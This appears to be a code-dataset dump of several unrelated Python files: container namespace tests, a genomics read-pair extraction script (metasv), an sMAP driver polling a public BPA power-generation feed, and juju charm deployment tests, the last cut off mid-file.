path=os.path.expanduser('~/.local/share/lxc/ubuntu/rootfs/')
)
c.start()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert out == 'ubuntu\n'
def test_all_inject(capfd):
"""Check all ns inject"""
c = Container(target=execute, args=(('bash','-c',
'mount -t proc /proc; sleep 0.1'),),
uid_map='1000', all=True
)
c.start()
i = Inject(target=execute, args=(('bash', '-c', 'id'),),
target_pid=c.pid, all=True
)
i.start()
i.join()
c.join()
out, err = capfd.readouterr()
print(out, err)
assert out.split()[:2] == ["uid=0(root)", "gid=65534(nogroup)"]
def test_not_all_inject(capfd):
"""Check inject without network ns"""
c = Container(target=execute, args=(('bash','-c',
'mount -t proc /proc; sleep 2'),),
uid_map='1000', all=True, net=False
)
c.start()
out0 = s.check_output("ifconfig -a", shell=True)
i = Inject(target=execute, args=(('ifconfig', '-a'),),
target_pid=c.pid, all=True
)
i.start()
i.join()
c.join()
out, err = capfd.readouterr()
print(out0)
print(out, err)
assert out != out0
def test_all_setns(capfd):
"""Check basic inject"""
c = Container(target=execute, args=(('bash','-c',
'mount -t proc /proc; sleep 2'),),
uid_map='1000', all=True
)
c.start()
with setns(c.pid, all=True):
outt = s.check_output("id", shell=True)
out, err = capfd.readouterr()
print(out, err)
print(outt)
c.join()
assert outt.split()[:2] == ["uid=0(root)", "gid=65534(nogroup)"]
if __name__ == '__main__':
pytest.main()
| 0.417509 | 0.474449 |
import argparse
import logging
import multiprocessing
import time
from functools import partial, update_wrapper
from defaults import EXTRACTION_MAX_READ_PAIRS, EXTRACTION_MAX_NM, EXTRACTION_MAX_INTERVAL_TRUNCATION, EXTRACTION_TRUNCATION_PAD
import pysam
compl_table = [chr(i) for i in xrange(256)]
compl_table[ord('A')] = 'T'
compl_table[ord('C')] = 'G'
compl_table[ord('G')] = 'C'
compl_table[ord('T')] = 'A'
def compl(seq):
return "".join([compl_table[ord(i)] for i in seq])
def get_sequence_quality(aln):
if not aln.is_reverse:
return aln.seq.upper(), aln.qual
return compl(aln.seq.upper())[::-1], aln.qual[::-1]
def write_read(fd, aln):
end_id = 1 if aln.is_read1 else 2
sequence, quality = get_sequence_quality(aln)
fd.write("@%s/%d\n%s\n+\n%s\n" % (aln.qname, end_id, sequence, quality))
def is_hq(aln, chr_tid, chr_start, chr_end):
return aln.is_unmapped or aln.mapq>0 or (not (aln.tid==chr_tid and chr_start<=aln.pos<=chr_end))
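# The extraction predicates below all share the signature (aln, mate, chr_tid, chr_start, chr_end)
# and return True when the read pair should be written to the output FASTQs.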
def all_pair(aln, mate, chr_tid, chr_start, chr_end):
return True
def all_pair_hq(aln, mate, chr_tid, chr_start, chr_end):
return is_hq(aln, chr_tid, chr_start, chr_end) and is_hq(mate, chr_tid, chr_start, chr_end)
def get_nm(aln):
nm_str = aln.opt("NM")
return int(nm_str) if nm_str else 0
def perfect_aln(aln):
return not aln.is_unmapped and aln.is_proper_pair and len(aln.cigar) == 1 and get_nm(aln) <= EXTRACTION_MAX_NM
def non_perfect(aln, mate, chr_tid, chr_start, chr_end):
return not (perfect_aln(aln) and perfect_aln(mate))
def non_perfect_hq(aln, mate, chr_tid, chr_start, chr_end):
return (not (perfect_aln(aln) and perfect_aln(mate))) and is_hq(aln, chr_tid, chr_start, chr_end) and is_hq(mate, chr_tid, chr_start, chr_end)
def discordant(aln, mate, chr_tid, chr_start, chr_end, isize_min=300, isize_max=400):
if aln.tlen == 0: return True
return not (isize_min <= abs(aln.tlen) <= isize_max)
def discordant_with_normal_orientation(aln, mate, chr_tid, chr_start, chr_end, isize_min=300, isize_max=400):
if aln.tlen == 0: return True
if aln.is_reverse and mate.is_reverse or not aln.is_reverse and not mate.is_reverse: return False
return not (isize_min <= abs(aln.tlen) <= isize_max)
def get_mate(aln, bam_handles):
mate = None
for bam_handle in bam_handles:
try:
mate = bam_handle.mate(aln)
except ValueError:
pass
if mate is not None:
return mate
return mate
def extract_read_pairs(bam_handles, region, prefix, extract_fns, pad=0, max_read_pairs = EXTRACTION_MAX_READ_PAIRS,
truncation_pad_read_extract = EXTRACTION_TRUNCATION_PAD,
max_interval_len_truncation = EXTRACTION_MAX_INTERVAL_TRUNCATION, sv_type=''):
logger = logging.getLogger("%s-%s" % (extract_read_pairs.__name__, multiprocessing.current_process()))
extract_fn_names = [extract_fn.__name__ for extract_fn in extract_fns]
logger.info("Extracting reads for region %s with padding %d using functions %s" % (
region, pad, extract_fn_names))
chr_name = str(region.split(':')[0])
chr_start = int(region.split(':')[1].split("-")[0]) - pad
chr_end = int(region.split(':')[1].split('-')[1]) + pad
selected_pair_counts = [0] * len(extract_fn_names)
start_time = time.time()
if chr_start < 0:
regions_to_extract = []
logger.error("Skipping read extraction since interval too close to chromosome beginning")
else:
        # Read this interval's alignments into memory and build a dictionary for mate lookup instead of calling the much slower bam_handle.mate() for every read
regions_to_extract = [(chr_name, chr_start, chr_end)]
if abs(chr_end-chr_start)>max_interval_len_truncation and sv_type in ["INV","DEL","DUP"]:
            # For large SVs, the middle of the interval has no effect on genotyping, so we only extract reads around the breakpoints to speed things up
truncate_start = chr_start + pad + truncation_pad_read_extract
truncate_end = chr_end - (pad + truncation_pad_read_extract)
logger.info("Truncate the reads in [%d-%d] for %s_%d_%d" % (truncate_start,truncate_end,chr_name,chr_start,chr_end))
regions_to_extract = [(chr_name, chr_start, truncate_start-1), (chr_name, truncate_end+1, chr_end)]
aln_list = [aln for (chr_, start_, end_) in regions_to_extract for bam_handle in bam_handles for aln in bam_handle.fetch(chr_, start=start_, end=end_) if not aln.is_secondary]
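        # aln_dict maps read name -> [read1 alignment, read2 alignment]; a slot stays None if that end was not seen in the interval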
aln_dict = {}
for aln in aln_list:
if aln.qname not in aln_dict:
aln_dict[aln.qname] = [None, None]
aln_dict[aln.qname][0 if aln.is_read1 else 1] = aln
aln_pairs = []
if len(aln_dict) <= max_read_pairs:
logger.info("Building mate dictionary from %d reads" % len(aln_list))
for aln_pair in aln_dict.values():
missing_index = 0 if aln_pair[0] is None else (1 if aln_pair[1] is None else 2)
if missing_index < 2:
mate = get_mate(aln_pair[1 - missing_index], bam_handles)
if mate is not None:
aln_pair[missing_index] = mate
aln_pairs.append(aln_pair)
else:
aln_pairs.append(aln_pair)
else:
logger.info("Too many reads encountered for %s. Skipping read extraction. (%d >%d)"%(region, len(aln_dict),max_read_pairs))
ends = [(open("%s_%s_1.fq" % (prefix, name), "w"), open("%s_%s_2.fq" % (prefix, name), "w")) for name in
extract_fn_names]
chr_tid = bam_handles[0].gettid(chr_name) if bam_handles else -1
for first, second in aln_pairs:
for fn_index, extract_fn in enumerate(extract_fns):
if extract_fn(first, second,chr_tid,chr_start,chr_end):
write_read(ends[fn_index][0], first)
write_read(ends[fn_index][1], second)
selected_pair_counts[fn_index] += 1
for end1, end2 in ends:
end1.close()
end2.close()
logger.info("Examined %d pairs in %g seconds" % (len(aln_pairs), time.time() - start_time))
logger.info("Extraction counts %s" % (zip(extract_fn_names, selected_pair_counts)))
return zip([(end[0].name, end[1].name) for end in ends], selected_pair_counts)
if __name__ == "__main__":
FORMAT = '%(levelname)s %(asctime)-15s %(name)-20s %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
parser = argparse.ArgumentParser(description="Extract reads and mates from a region for spades assembly",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--bams", nargs='+', help="BAM files to extract reads from", required=True, default=[])
parser.add_argument("--region", help="Samtools region string", required=True)
parser.add_argument("--prefix", help="Output FASTQ prefix", required=True)
parser.add_argument("--extract_fn", help="Extraction function", choices=["all_pair", "non_perfect", "discordant"],
default="all_pair")
parser.add_argument("--pad", help="Padding to apply on both sides of the interval", type=int, default=0)
parser.add_argument("--isize_min", help="Minimum insert size", default=200, type=int)
parser.add_argument("--isize_max", help="Maximum insert size", default=500, type=int)
parser.add_argument("--max_read_pairs", help="Maximum read pairs to extract for an interval",
default=EXTRACTION_MAX_READ_PAIRS, type=int)
args = parser.parse_args()
if args.extract_fn == 'all_pair':
extract_fn = all_pair
elif args.extract_fn == 'non_perfect':
extract_fn = non_perfect
else:
extract_fn = partial(discordant, isize_min=args.isize_min, isize_max=args.isize_max)
update_wrapper(extract_fn, discordant)
bam_handles = [pysam.Samfile(bam, "rb") for bam in args.bams]
extract_read_pairs(bam_handles, args.region, args.prefix, [extract_fn], pad=args.pad,
max_read_pairs=args.max_read_pairs)
for bam_handle in bam_handles:
bam_handle.close()
|
metasv/extract_pairs.py
|
import argparse
import logging
import multiprocessing
import time
from functools import partial, update_wrapper
from defaults import EXTRACTION_MAX_READ_PAIRS, EXTRACTION_MAX_NM, EXTRACTION_MAX_INTERVAL_TRUNCATION, EXTRACTION_TRUNCATION_PAD
import pysam
compl_table = [chr(i) for i in xrange(256)]
compl_table[ord('A')] = 'T'
compl_table[ord('C')] = 'G'
compl_table[ord('G')] = 'C'
compl_table[ord('T')] = 'A'
def compl(seq):
return "".join([compl_table[ord(i)] for i in seq])
def get_sequence_quality(aln):
if not aln.is_reverse:
return aln.seq.upper(), aln.qual
return compl(aln.seq.upper())[::-1], aln.qual[::-1]
def write_read(fd, aln):
end_id = 1 if aln.is_read1 else 2
sequence, quality = get_sequence_quality(aln)
fd.write("@%s/%d\n%s\n+\n%s\n" % (aln.qname, end_id, sequence, quality))
def is_hq(aln, chr_tid, chr_start, chr_end):
return aln.is_unmapped or aln.mapq>0 or (not (aln.tid==chr_tid and chr_start<=aln.pos<=chr_end))
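# The extraction predicates below all share the signature (aln, mate, chr_tid, chr_start, chr_end)
# and return True when the read pair should be written to the output FASTQs.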
def all_pair(aln, mate, chr_tid, chr_start, chr_end):
return True
def all_pair_hq(aln, mate, chr_tid, chr_start, chr_end):
return is_hq(aln, chr_tid, chr_start, chr_end) and is_hq(mate, chr_tid, chr_start, chr_end)
def get_nm(aln):
nm_str = aln.opt("NM")
return int(nm_str) if nm_str else 0
def perfect_aln(aln):
return not aln.is_unmapped and aln.is_proper_pair and len(aln.cigar) == 1 and get_nm(aln) <= EXTRACTION_MAX_NM
def non_perfect(aln, mate, chr_tid, chr_start, chr_end):
return not (perfect_aln(aln) and perfect_aln(mate))
def non_perfect_hq(aln, mate, chr_tid, chr_start, chr_end):
return (not (perfect_aln(aln) and perfect_aln(mate))) and is_hq(aln, chr_tid, chr_start, chr_end) and is_hq(mate, chr_tid, chr_start, chr_end)
def discordant(aln, mate, chr_tid, chr_start, chr_end, isize_min=300, isize_max=400):
if aln.tlen == 0: return True
return not (isize_min <= abs(aln.tlen) <= isize_max)
def discordant_with_normal_orientation(aln, mate, chr_tid, chr_start, chr_end, isize_min=300, isize_max=400):
if aln.tlen == 0: return True
if aln.is_reverse and mate.is_reverse or not aln.is_reverse and not mate.is_reverse: return False
return not (isize_min <= abs(aln.tlen) <= isize_max)
def get_mate(aln, bam_handles):
mate = None
for bam_handle in bam_handles:
try:
mate = bam_handle.mate(aln)
except ValueError:
pass
if mate is not None:
return mate
return mate
def extract_read_pairs(bam_handles, region, prefix, extract_fns, pad=0, max_read_pairs = EXTRACTION_MAX_READ_PAIRS,
truncation_pad_read_extract = EXTRACTION_TRUNCATION_PAD,
max_interval_len_truncation = EXTRACTION_MAX_INTERVAL_TRUNCATION, sv_type=''):
logger = logging.getLogger("%s-%s" % (extract_read_pairs.__name__, multiprocessing.current_process()))
extract_fn_names = [extract_fn.__name__ for extract_fn in extract_fns]
logger.info("Extracting reads for region %s with padding %d using functions %s" % (
region, pad, extract_fn_names))
chr_name = str(region.split(':')[0])
chr_start = int(region.split(':')[1].split("-")[0]) - pad
chr_end = int(region.split(':')[1].split('-')[1]) + pad
selected_pair_counts = [0] * len(extract_fn_names)
start_time = time.time()
if chr_start < 0:
regions_to_extract = []
logger.error("Skipping read extraction since interval too close to chromosome beginning")
else:
        # Read this interval's alignments into memory and build a dictionary for mate lookup instead of calling the much slower bam_handle.mate() for every read
regions_to_extract = [(chr_name, chr_start, chr_end)]
if abs(chr_end-chr_start)>max_interval_len_truncation and sv_type in ["INV","DEL","DUP"]:
            # For large SVs, the middle of the interval has no effect on genotyping, so we only extract reads around the breakpoints to speed things up
truncate_start = chr_start + pad + truncation_pad_read_extract
truncate_end = chr_end - (pad + truncation_pad_read_extract)
logger.info("Truncate the reads in [%d-%d] for %s_%d_%d" % (truncate_start,truncate_end,chr_name,chr_start,chr_end))
regions_to_extract = [(chr_name, chr_start, truncate_start-1), (chr_name, truncate_end+1, chr_end)]
aln_list = [aln for (chr_, start_, end_) in regions_to_extract for bam_handle in bam_handles for aln in bam_handle.fetch(chr_, start=start_, end=end_) if not aln.is_secondary]
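        # aln_dict maps read name -> [read1 alignment, read2 alignment]; a slot stays None if that end was not seen in the interval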
aln_dict = {}
for aln in aln_list:
if aln.qname not in aln_dict:
aln_dict[aln.qname] = [None, None]
aln_dict[aln.qname][0 if aln.is_read1 else 1] = aln
aln_pairs = []
if len(aln_dict) <= max_read_pairs:
logger.info("Building mate dictionary from %d reads" % len(aln_list))
for aln_pair in aln_dict.values():
missing_index = 0 if aln_pair[0] is None else (1 if aln_pair[1] is None else 2)
if missing_index < 2:
mate = get_mate(aln_pair[1 - missing_index], bam_handles)
if mate is not None:
aln_pair[missing_index] = mate
aln_pairs.append(aln_pair)
else:
aln_pairs.append(aln_pair)
else:
logger.info("Too many reads encountered for %s. Skipping read extraction. (%d >%d)"%(region, len(aln_dict),max_read_pairs))
ends = [(open("%s_%s_1.fq" % (prefix, name), "w"), open("%s_%s_2.fq" % (prefix, name), "w")) for name in
extract_fn_names]
chr_tid = bam_handles[0].gettid(chr_name) if bam_handles else -1
for first, second in aln_pairs:
for fn_index, extract_fn in enumerate(extract_fns):
if extract_fn(first, second,chr_tid,chr_start,chr_end):
write_read(ends[fn_index][0], first)
write_read(ends[fn_index][1], second)
selected_pair_counts[fn_index] += 1
for end1, end2 in ends:
end1.close()
end2.close()
logger.info("Examined %d pairs in %g seconds" % (len(aln_pairs), time.time() - start_time))
logger.info("Extraction counts %s" % (zip(extract_fn_names, selected_pair_counts)))
return zip([(end[0].name, end[1].name) for end in ends], selected_pair_counts)
if __name__ == "__main__":
FORMAT = '%(levelname)s %(asctime)-15s %(name)-20s %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
parser = argparse.ArgumentParser(description="Extract reads and mates from a region for spades assembly",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--bams", nargs='+', help="BAM files to extract reads from", required=True, default=[])
parser.add_argument("--region", help="Samtools region string", required=True)
parser.add_argument("--prefix", help="Output FASTQ prefix", required=True)
parser.add_argument("--extract_fn", help="Extraction function", choices=["all_pair", "non_perfect", "discordant"],
default="all_pair")
parser.add_argument("--pad", help="Padding to apply on both sides of the interval", type=int, default=0)
parser.add_argument("--isize_min", help="Minimum insert size", default=200, type=int)
parser.add_argument("--isize_max", help="Maximum insert size", default=500, type=int)
parser.add_argument("--max_read_pairs", help="Maximum read pairs to extract for an interval",
default=EXTRACTION_MAX_READ_PAIRS, type=int)
args = parser.parse_args()
if args.extract_fn == 'all_pair':
extract_fn = all_pair
elif args.extract_fn == 'non_perfect':
extract_fn = non_perfect
else:
extract_fn = partial(discordant, isize_min=args.isize_min, isize_max=args.isize_max)
update_wrapper(extract_fn, discordant)
bam_handles = [pysam.Samfile(bam, "rb") for bam in args.bams]
extract_read_pairs(bam_handles, args.region, args.prefix, [extract_fn], pad=args.pad,
max_read_pairs=args.max_read_pairs)
for bam_handle in bam_handles:
bam_handle.close()
| 0.218503 | 0.154185 |
'''
sMAP feed for BPA Total Wind, Hydro, and Thermal Generation.
@author <NAME>
'''
import urllib2
import logging
from smap.driver import SmapDriver
from smap.util import periodicSequentialCall
from smap.contrib import dtutil
class BPADriver(SmapDriver):
'''
Scrape feed from BPA site and parse as a sMAP feed. BPA updates approximately every 5 minutes so we
update every 2.5 minutes to make sure we catch all the updates (updates are correctly timestamped
in increments of 5 minutes). We parse wind, hydro and thermal feeds.
'''
def setup(self, opts):
self.w = self.add_timeseries('/wind','MW',description='Total Wind Generation')
self.h = self.add_timeseries('/hydro','MW',description='Total Hydro Generation')
self.t = self.add_timeseries('/thermal','MW',description='Total Thermal Generation')
self.l = self.add_timeseries('/load','MW',description='Total Load')
self.set_metadata = {
'Location' : {'State': 'WA', 'Uri': 'http://transmission.bpa.gov/business/operations/wind/baltwg.txt'}
}
self.previousTime = 0
def start(self):
periodicSequentialCall(self.read).start(5*30) # updates every 2.5 minutes
def read(self):
object_ = {}
print('read running')
try:
            # get the text from the URL
wa = urllib2.urlopen('http://transmission.bpa.gov/business/operations/wind/baltwg.txt')
data = [line for line in wa.readlines()[7:] if len(line.split()) > 3]
            # parse the most recent line; the code expects whitespace-separated fields: date, time, load, wind, hydro, thermal
rawTime = " ".join(data[-1].split()[:2])
currentTime = int(dtutil.dt2ts(dtutil.strptime_tz(rawTime,"%m/%d/%Y %H:%M",'US/Pacific')))
object_["Wind"] = data[-1].split()[3]
object_["Hydro"] = data[-1].split()[4]
object_["Thermal"] = data[-1].split()[5]
object_["Load"] = data[-1].split()[2]
except Exception as e:
logging.exception(type(e))
print(e)
else:
if currentTime != self.previousTime:
self.w.add(currentTime,int(object_["Wind"]))
self.h.add(currentTime,int(object_["Hydro"]))
self.t.add(currentTime,int(object_["Thermal"]))
self.l.add(currentTime,int(object_["Load"]))
self.previousTime = currentTime
wa.close()
|
python/smap/drivers/washingtonbpa.py
|
'''
sMAP feed for BPA Total Wind, Hydro, and Thermal Generation.
@author <NAME>
'''
import urllib2
import logging
from smap.driver import SmapDriver
from smap.util import periodicSequentialCall
from smap.contrib import dtutil
class BPADriver(SmapDriver):
'''
Scrape feed from BPA site and parse as a sMAP feed. BPA updates approximately every 5 minutes so we
update every 2.5 minutes to make sure we catch all the updates (updates are correctly timestamped
in increments of 5 minutes). We parse wind, hydro and thermal feeds.
'''
def setup(self, opts):
self.w = self.add_timeseries('/wind','MW',description='Total Wind Generation')
self.h = self.add_timeseries('/hydro','MW',description='Total Hydro Generation')
self.t = self.add_timeseries('/thermal','MW',description='Total Thermal Generation')
self.l = self.add_timeseries('/load','MW',description='Total Load')
self.set_metadata = {
'Location' : {'State': 'WA', 'Uri': 'http://transmission.bpa.gov/business/operations/wind/baltwg.txt'}
}
self.previousTime = 0
def start(self):
periodicSequentialCall(self.read).start(5*30) # updates every 2.5 minutes
def read(self):
object_ = {}
print('read running')
try:
            # get the text from the URL
wa = urllib2.urlopen('http://transmission.bpa.gov/business/operations/wind/baltwg.txt')
data = [line for line in wa.readlines()[7:] if len(line.split()) > 3]
            # parse the most recent line; the code expects whitespace-separated fields: date, time, load, wind, hydro, thermal
rawTime = " ".join(data[-1].split()[:2])
currentTime = int(dtutil.dt2ts(dtutil.strptime_tz(rawTime,"%m/%d/%Y %H:%M",'US/Pacific')))
object_["Wind"] = data[-1].split()[3]
object_["Hydro"] = data[-1].split()[4]
object_["Thermal"] = data[-1].split()[5]
object_["Load"] = data[-1].split()[2]
except Exception as e:
logging.exception(type(e))
print(e)
else:
if currentTime != self.previousTime:
self.w.add(currentTime,int(object_["Wind"]))
self.h.add(currentTime,int(object_["Hydro"]))
self.t.add(currentTime,int(object_["Thermal"]))
self.l.add(currentTime,int(object_["Load"]))
self.previousTime = currentTime
wa.close()
| 0.437103 | 0.362518 |
from pathlib import Path
import pytest
from .. import base
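# Memory constraint values below are expressed in megabytes.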
MB = 1
@base.bootstrapped
@pytest.mark.asyncio
async def test_action(event_loop):
async with base.CleanModel() as model:
ubuntu_app = await model.deploy(
'percona-cluster',
application_name='mysql',
series='xenial',
channel='stable',
config={
'tuning-level': 'safest',
},
constraints={
'arch': 'amd64',
'mem': 256 * MB,
},
)
# update and check app config
await ubuntu_app.set_config({'tuning-level': 'fast'})
config = await ubuntu_app.get_config()
assert config['tuning-level']['value'] == 'fast'
# Restore config back to default
await ubuntu_app.reset_config(['tuning-level'])
config = await ubuntu_app.get_config()
assert config['tuning-level']['value'] == 'safest'
# update and check app constraints
await ubuntu_app.set_constraints({'mem': 512 * MB})
constraints = await ubuntu_app.get_constraints()
assert constraints['mem'] == 512 * MB
# check action definitions
actions = await ubuntu_app.get_actions()
assert 'backup' in actions.keys()
@base.bootstrapped
@pytest.mark.asyncio
async def test_get_set_config(event_loop):
async with base.CleanModel() as model:
ubuntu_app = await model.deploy(
'percona-cluster',
application_name='mysql',
series='xenial',
channel='stable',
config={
'tuning-level': 'safest',
},
constraints={
'arch': 'amd64',
'mem': 256 * MB,
},
)
config = await ubuntu_app.get_config()
await ubuntu_app.set_config(config)
config2 = await ubuntu_app.get_config()
assert config == config2
@base.bootstrapped
@pytest.mark.asyncio
async def test_status_is_not_unset(event_loop):
async with base.CleanModel() as model:
app = await model.deploy(
'cs:ubuntu-0',
application_name='ubuntu',
series='trusty',
channel='stable',
)
assert app.status != 'unset'
@base.bootstrapped
@pytest.mark.asyncio
async def test_status(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:~juju-qa/blocked-0')
def app_ready():
if not app.units:
return False
return app.status == 'blocked'
await model.block_until(app_ready, timeout=480)
assert app.status == 'blocked'
@base.bootstrapped
@pytest.mark.asyncio
async def test_add_units(event_loop):
from juju.unit import Unit
async with base.CleanModel() as model:
app = await model.deploy(
'cs:ubuntu-0',
application_name='ubuntu',
series='trusty',
channel='stable',
)
units = await app.add_units(count=2)
assert len(units) == 2
for unit in units:
assert isinstance(unit, Unit)
@base.bootstrapped
@pytest.mark.asyncio
async def test_deploy_charmstore_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_deploy_charmhub_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ch:hello-juju')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert 'hello-juju' in app.data['charm-url']
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm()
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_channel(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(channel='stable')
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_revision(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(revision=8)
assert app.data['charm-url'] == 'cs:ubuntu-8'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_switch(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(switch='ubuntu-8')
assert app.data['charm-url'] == 'cs:ubuntu-8'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_local_charm(event_loop):
async with base.CleanModel() as model:
tests_dir = Path(__file__).absolute().parent
charm_path = tests_dir / 'upgrade-charm'
app = await model.deploy('cs:ubuntu', series='focal')
await model.wait_for_idle(status="active")
assert app.data['charm-url'].startswith('cs:ubuntu')
await app.upgrade_charm(path=charm_path)
await model.wait_for_idle(status="waiting")
assert app.data['charm-url'] == 'local:focal/ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_resource(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:~juju-qa/bionic/upgrade-charm-resource-test-0')
await model.wait_for_idle(wait_for_units=1)
unit = app.units[0]
expected_message = 'I have no resource.'
assert unit.workload_status_message == expected_message
await app.upgrade_charm(revision=1)
await model.block_until(
lambda: unit.workload_status_message != 'I have no resource.',
timeout=60,
)
expected_message = 'My resource: I am the resource.'
assert app.units[0].workload_status_message == expected_message
@base.bootstrapped
@pytest.mark.asyncio
async def test_trusted(event_loop):
async with base.CleanModel() as model:
await model.deploy('cs:~juju-qa/bundle/basic-trusted-1', trust=True)
ubuntu_app = model.applications['ubuntu']
trusted = await ubuntu_app.get_trusted()
assert trusted is True
await ubuntu_app.set_trusted(False)
trusted = await ubuntu_app.get_trusted()
assert trusted is False
|
tests/integration/test_application.py
|
from pathlib import Path
import pytest
from .. import base
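# Memory constraint values below are expressed in megabytes.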
MB = 1
@base.bootstrapped
@pytest.mark.asyncio
async def test_action(event_loop):
async with base.CleanModel() as model:
ubuntu_app = await model.deploy(
'percona-cluster',
application_name='mysql',
series='xenial',
channel='stable',
config={
'tuning-level': 'safest',
},
constraints={
'arch': 'amd64',
'mem': 256 * MB,
},
)
# update and check app config
await ubuntu_app.set_config({'tuning-level': 'fast'})
config = await ubuntu_app.get_config()
assert config['tuning-level']['value'] == 'fast'
# Restore config back to default
await ubuntu_app.reset_config(['tuning-level'])
config = await ubuntu_app.get_config()
assert config['tuning-level']['value'] == 'safest'
# update and check app constraints
await ubuntu_app.set_constraints({'mem': 512 * MB})
constraints = await ubuntu_app.get_constraints()
assert constraints['mem'] == 512 * MB
# check action definitions
actions = await ubuntu_app.get_actions()
assert 'backup' in actions.keys()
@base.bootstrapped
@pytest.mark.asyncio
async def test_get_set_config(event_loop):
async with base.CleanModel() as model:
ubuntu_app = await model.deploy(
'percona-cluster',
application_name='mysql',
series='xenial',
channel='stable',
config={
'tuning-level': 'safest',
},
constraints={
'arch': 'amd64',
'mem': 256 * MB,
},
)
config = await ubuntu_app.get_config()
await ubuntu_app.set_config(config)
config2 = await ubuntu_app.get_config()
assert config == config2
@base.bootstrapped
@pytest.mark.asyncio
async def test_status_is_not_unset(event_loop):
async with base.CleanModel() as model:
app = await model.deploy(
'cs:ubuntu-0',
application_name='ubuntu',
series='trusty',
channel='stable',
)
assert app.status != 'unset'
@base.bootstrapped
@pytest.mark.asyncio
async def test_status(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:~juju-qa/blocked-0')
def app_ready():
if not app.units:
return False
return app.status == 'blocked'
await model.block_until(app_ready, timeout=480)
assert app.status == 'blocked'
@base.bootstrapped
@pytest.mark.asyncio
async def test_add_units(event_loop):
from juju.unit import Unit
async with base.CleanModel() as model:
app = await model.deploy(
'cs:ubuntu-0',
application_name='ubuntu',
series='trusty',
channel='stable',
)
units = await app.add_units(count=2)
assert len(units) == 2
for unit in units:
assert isinstance(unit, Unit)
@base.bootstrapped
@pytest.mark.asyncio
async def test_deploy_charmstore_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_deploy_charmhub_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ch:hello-juju')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert 'hello-juju' in app.data['charm-url']
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm()
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_channel(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(channel='stable')
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_revision(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(revision=8)
assert app.data['charm-url'] == 'cs:ubuntu-8'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_switch(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(switch='ubuntu-8')
assert app.data['charm-url'] == 'cs:ubuntu-8'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_local_charm(event_loop):
async with base.CleanModel() as model:
tests_dir = Path(__file__).absolute().parent
charm_path = tests_dir / 'upgrade-charm'
app = await model.deploy('cs:ubuntu', series='focal')
await model.wait_for_idle(status="active")
assert app.data['charm-url'].startswith('cs:ubuntu')
await app.upgrade_charm(path=charm_path)
await model.wait_for_idle(status="waiting")
assert app.data['charm-url'] == 'local:focal/ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_resource(event_loop):
async with base.CleanModel() as model:
